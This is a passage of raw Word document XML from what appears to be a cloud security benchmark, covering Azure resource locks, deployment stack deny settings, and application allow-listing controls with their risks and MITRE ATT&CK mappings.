    </w:p>
    <w:p w14:paraId="65F58884" w14:textId="69488CDB" w:rsidR="000E0219" w:rsidRDefault="000E0219" w:rsidP="00D00263">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="000E0219">
        <w:t>Session duration limits: Configure short session lifetime for privileged access requiring frequent reauthentication for sustained infrastructure management activities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E26925" w14:textId="5A6FFCCE" w:rsidR="000E0219" w:rsidRPr="000E0219" w:rsidRDefault="000E0219" w:rsidP="00D00263">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="000E0219">
        <w:t>Terms of use requirement: Require acceptance of terms of use outlining acceptable use policies and security responsibilities before Azure management access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FDB935" w14:textId="77777777" w:rsidR="000E0219" w:rsidRDefault="000E0219" w:rsidP="000E0219"/>
    <w:p w14:paraId="667496EF" w14:textId="0EA31AC8" w:rsidR="000E0219" w:rsidRDefault="000E0219" w:rsidP="000E0219">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E0219">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>AM-4.3: Implement resource locks and immutability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD4F89E" w14:textId="576058F7" w:rsidR="000E0219" w:rsidRDefault="000E0219" w:rsidP="00D00263">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="000E0219">
        <w:t>Enforce resource immutability through these protection mechanisms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48969D99" w14:textId="05AF1EA7" w:rsidR="000E0219" w:rsidRDefault="000E0219">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="173"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000E0219">
        <w:t>Resource lock strategy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B0E9F9" w14:textId="43D53DBC" w:rsidR="000E0219" w:rsidRDefault="000E0219" w:rsidP="00D00263">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E0219">
        <w:lastRenderedPageBreak/>
        <w:t>CanNotDelete</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E0219">
        <w:t xml:space="preserve"> locks: Apply </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E0219">
        <w:t>CanNotDelete</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E0219">
        <w:t xml:space="preserve"> locks to production resources preventing accidental deletion while allowing configuration modifications for operational flexibility</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FFF2A6" w14:textId="40EFD278" w:rsidR="000E0219" w:rsidRDefault="000E0219" w:rsidP="00D00263">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E0219">
        <w:t>ReadOnly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E0219">
        <w:t xml:space="preserve"> locks: Deploy </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E0219">
        <w:t>ReadOnly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E0219">
        <w:t xml:space="preserve"> locks on sensitive infrastructure including network security groups, virtual networks, and identity resources preventing any modifications without lock removal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F19EFF5" w14:textId="02D3498D" w:rsidR="000E0219" w:rsidRDefault="000E0219" w:rsidP="00D00263">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="000E0219">
        <w:t>Inherited locks: Apply locks at resource group or subscription level with inheritance to child resources simplifying governance and preventing lock bypass through new resource creation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A74EB6" w14:textId="46CBCE73" w:rsidR="000E0219" w:rsidRDefault="000E0219" w:rsidP="00D00263">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="000E0219">
        <w:t>Lock removal approval workflow: Require security team approval and change management process for lock removal with audit logging and justification documentation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296513EE" w14:textId="2585BC23" w:rsidR="000E0219" w:rsidRDefault="000E0219">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="173"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000E0219">
        <w:t>Azure Deployment Stacks deny settings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1200DC14" w14:textId="006F1FE7" w:rsidR="000E0219" w:rsidRDefault="000E0219" w:rsidP="00D00263">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="000E0219">
        <w:t xml:space="preserve">Deployment </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000E0219">
        <w:t>stack</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000E0219">
        <w:t xml:space="preserve"> deny assignments: Deployment stacks with deny settings </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000E0219">
        <w:t>preventing</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000E0219">
        <w:t xml:space="preserve"> modification or deletion of managed resources even by subscription owners ensuring infrastructure immutability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03AFA5B8" w14:textId="761D2A4F" w:rsidR="000E0219" w:rsidRDefault="000E0219" w:rsidP="00D00263">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E0219">
        <w:t>DenyDelete</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E0219">
        <w:t xml:space="preserve"> mode: Deployment stacks configured with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E0219">
        <w:t>DenyDelete</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E0219">
        <w:t xml:space="preserve"> protecting policy assignments, role assignments, and deployed resources from removal while allowing configuration updates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F034FC" w14:textId="2CE794CC" w:rsidR="000E0219" w:rsidRDefault="000E0219" w:rsidP="00D00263">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E0219">
        <w:t>DenyWriteAndDelete</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E0219">
        <w:t xml:space="preserve"> mode: Deployment stacks with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E0219">
        <w:t>DenyWriteAndDelete</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E0219">
        <w:t xml:space="preserve"> preventing any modifications to governance configurations requiring stack update through controlled infrastructure-as-code process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10805F82" w14:textId="7EE6965F" w:rsidR="000E0219" w:rsidRDefault="000E0219" w:rsidP="000E0219">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="57" w:name="_Toc242449520"/>
      <w:r w:rsidRPr="000E0219">
        <w:t>Service approval and application control</w:t>
      </w:r>
      <w:bookmarkEnd w:id="57"/>
    </w:p>
    <w:p w14:paraId="4726A297" w14:textId="1C03E512" w:rsidR="000E0219" w:rsidRDefault="000E0219" w:rsidP="000E0219">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="58" w:name="_Toc242449521"/>
      <w:r w:rsidRPr="000E0219">
        <w:t>AM-5: Use only approved applications in virtual machine</w:t>
      </w:r>
      <w:bookmarkEnd w:id="58"/>
    </w:p>
    <w:p w14:paraId="721D2F4E" w14:textId="0648928E" w:rsidR="000E0219" w:rsidRDefault="000E0219">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="174"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000E0219">
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7299268B" w14:textId="064C6662" w:rsidR="000E0219" w:rsidRDefault="000E0219" w:rsidP="007C732F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="000E0219">
        <w:t xml:space="preserve">Enforce application control through allow list policies and behavioral monitoring ensuring only authorized software executes on </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000E0219">
        <w:t>compute</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000E0219">
        <w:t xml:space="preserve"> assets. Prevent unauthorized software execution including malware, unapproved tools, and outdated applications while maintaining operational flexibility for approved business applications and administrative tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D3EB62" w14:textId="7F16E449" w:rsidR="000E0219" w:rsidRDefault="000E0219">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="174"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000E0219">
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000E0219">
        <w:t>to mitigate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4BE47DA9" w14:textId="232FC8AA" w:rsidR="000E0219" w:rsidRDefault="000E0219" w:rsidP="007C732F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="000E0219">
        <w:t>Malware and ransomware execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B98ED8" w14:textId="31FBE5A4" w:rsidR="000E0219" w:rsidRDefault="000E0219" w:rsidP="007C732F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="176"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="000E0219">
        <w:t>Malware and ransomware execution: Lack of application allow listing allows malware, ransomware, and other malicious software to execute freely once attackers gain system access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14710670" w14:textId="2535719E" w:rsidR="000E0219" w:rsidRDefault="000E0219" w:rsidP="007C732F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="000E0219">
        <w:t>Unauthorized administrative tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5880B69D" w14:textId="098969E8" w:rsidR="000E0219" w:rsidRDefault="000E0219" w:rsidP="007C732F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="176"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="000E0219">
        <w:lastRenderedPageBreak/>
        <w:t>Attackers install remote access tools, network scanners, credential dumping utilities, and other post-exploitation tools supporting attack progression.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41BC8B7B" w14:textId="157813E7" w:rsidR="000E0219" w:rsidRDefault="000E0219" w:rsidP="007C732F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="000E0219">
        <w:t>Unapproved commercial software</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5E5AD9" w14:textId="523C15C7" w:rsidR="000E0219" w:rsidRDefault="000E0219" w:rsidP="007C732F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="176"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="000E0219">
        <w:t>Users install unlicensed software, personal tools, and unapproved applications creating legal liability, security vulnerabilities, and support challenges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67859A7C" w14:textId="48232DE6" w:rsidR="000E0219" w:rsidRDefault="000E0219" w:rsidP="007C732F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="000E0219">
        <w:t>Outdated vulnerable software</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202FB79B" w14:textId="2BD40E6F" w:rsidR="000E0219" w:rsidRDefault="000E0219" w:rsidP="007C732F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="175"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="000E0219">
        <w:t>Legacy applications and outdated software versions persist on systems containing known vulnerabilities exploitable by attackers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E1A229" w14:textId="375AF8E9" w:rsidR="000E0219" w:rsidRDefault="000E0219" w:rsidP="007C732F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="000E0219">
        <w:t>Insider threat tool usage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC88AB3" w14:textId="0466CFDD" w:rsidR="000E0219" w:rsidRDefault="000E0219" w:rsidP="007C732F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="175"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="000E0219">
        <w:t>Malicious insiders install data exfiltration tools, encryption utilities, and system sabotage applications without detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125DF5AA" w14:textId="4B206C6C" w:rsidR="000E0219" w:rsidRDefault="000E0219" w:rsidP="007C732F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="000E0219">
        <w:t>Cryptocurrency mining and abuse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFF4CBB" w14:textId="266F675F" w:rsidR="000E0219" w:rsidRPr="000E0219" w:rsidRDefault="000E0219" w:rsidP="007C732F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="175"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="000E0219">
        <w:t>Compromised systems execute cryptocurrency miners, botnet clients, and other resource-intensive malicious applications degrading performance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14EE4187" w14:textId="5D0DD7F9" w:rsidR="000E0219" w:rsidRDefault="0051179C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="174"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0051179C">
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39712827" w14:textId="40F71A9D" w:rsidR="0051179C" w:rsidRDefault="0051179C" w:rsidP="007C732F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="0051179C">
        <w:t>Execution (TA0002)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54387229" w14:textId="609A6FE8" w:rsidR="00F563AE" w:rsidRDefault="00F563AE" w:rsidP="007C732F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="392"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00F563AE">
        <w:t>user execution (T1204) tricking users into executing malicious software that bypasses application control mechanisms or exploits policy gaps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B2C5E1" w14:textId="2205A789" w:rsidR="0051179C" w:rsidRDefault="0051179C" w:rsidP="007C732F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="0051179C">
        <w:t>Defense Evasion (TA0005)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423AFB0E" w14:textId="40C3E585" w:rsidR="00F563AE" w:rsidRDefault="00F563AE" w:rsidP="007C732F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="392"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00F563AE">
        <w:t>masquerading (T1036) disguising malicious executables as legitimate applications attempting to bypass application allow listing controls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623DFE31" w14:textId="7EEA00D1" w:rsidR="0051179C" w:rsidRDefault="0051179C" w:rsidP="007C732F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="0051179C">
        <w:t>Credential Access (TA0006)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE57E71" w14:textId="0F7CF816" w:rsidR="00F563AE" w:rsidRDefault="00F563AE" w:rsidP="007C732F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="392"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00F563AE">
        <w:t xml:space="preserve">OS credential dumping (T1003) executing credential theft tools like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F563AE">
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F563AE">
        <w:t xml:space="preserve"> harvesting credentials from memory for privilege escalation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D1F98F" w14:textId="736FF070" w:rsidR="0051179C" w:rsidRDefault="0051179C" w:rsidP="0051179C">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0051179C">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>AM-5.1: Implement adaptive application controls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38370F67" w14:textId="3197F7BD" w:rsidR="0051179C" w:rsidRDefault="0051179C" w:rsidP="00AF63DB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="0051179C">
        <w:t xml:space="preserve">Establish executable </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0051179C">
        <w:t>restriction</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0051179C">
        <w:t xml:space="preserve"> through these application controls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9C72EE" w14:textId="1BBCE071" w:rsidR="0051179C" w:rsidRDefault="0051179C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="177"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0051179C">
        <w:t>Adaptive application control implementation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3568B206" w14:textId="2D4AB363" w:rsidR="0051179C" w:rsidRDefault="0051179C" w:rsidP="00AF63DB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="0051179C">
        <w:t>Automated allow list generation: Machine learning-powered analysis of application execution patterns generating recommended allow lists for virtual machine groups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E532470" w14:textId="6E759382" w:rsidR="0051179C" w:rsidRDefault="0051179C" w:rsidP="00AF63DB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="0051179C">
        <w:t>Audit mode learning period: Initial deployment in audit mode observing application execution patterns without enforcement building comprehensive application baseline.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790415BF" w14:textId="70005E20" w:rsidR="0051179C" w:rsidRDefault="0051179C" w:rsidP="00AF63DB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="0051179C">
        <w:t>Enforcement mode activation: Transition to enforcement mode blocking unauthorized application execution after baseline establishment with ongoing learning and automatic rule updates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D389AF7" w14:textId="1E108188" w:rsidR="0051179C" w:rsidRDefault="0051179C" w:rsidP="00AF63DB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="0051179C">
        <w:lastRenderedPageBreak/>
        <w:t>File integrity monitoring: Integration with file integrity monitoring detecting unauthorized application installation attempts and configuration file modifications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA7A263" w14:textId="4A280249" w:rsidR="0051179C" w:rsidRDefault="0051179C" w:rsidP="00AF63DB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="0051179C">
        <w:t>Publisher-based rules: Application allow list rules based on publisher certificates, file hashes, and path specifications balancing security with operational flexibility.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E16F2A4" w14:textId="7437F51D" w:rsidR="0051179C" w:rsidRDefault="0051179C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="177"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0051179C">
        <w:t>Application control policy configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC716E4" w14:textId="7BA757E4" w:rsidR="0051179C" w:rsidRDefault="0051179C" w:rsidP="00AF63DB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="0051179C">
        <w:t>Group-based policies: Organize virtual machines into groups based on application requirements applying tailored application control policies per server role.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038D70F9" w14:textId="64A667AC" w:rsidR="0051179C" w:rsidRDefault="0051179C" w:rsidP="00AF63DB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="0051179C">
        <w:t>Recommended rule acceptance: Review and accept adaptive application control recommendations with security team validation before enforcement activation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716A5498" w14:textId="07A8D3B8" w:rsidR="0051179C" w:rsidRDefault="0051179C" w:rsidP="00AF63DB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="0051179C">
        <w:t>Custom rule addition: Add custom allow list rules for business-specific applications, scripts, and administrative tools not automatically discovered during learning phase.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090B621A" w14:textId="007FAA21" w:rsidR="0051179C" w:rsidRDefault="0051179C" w:rsidP="00AF63DB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="0051179C">
        <w:t>Alert and violation monitoring: Monitor application control violations in Defender for Cloud with automated alerts for unauthorized execution attempts requiring investigation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06827769" w14:textId="1F9F7E43" w:rsidR="0051179C" w:rsidRDefault="0051179C" w:rsidP="0051179C">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0051179C">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>AM-5.2: Implement software inventory and change tracking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C24ED4" w14:textId="2E5E70C8" w:rsidR="0051179C" w:rsidRDefault="0051179C" w:rsidP="00AF63DB">
      <w:pPr>
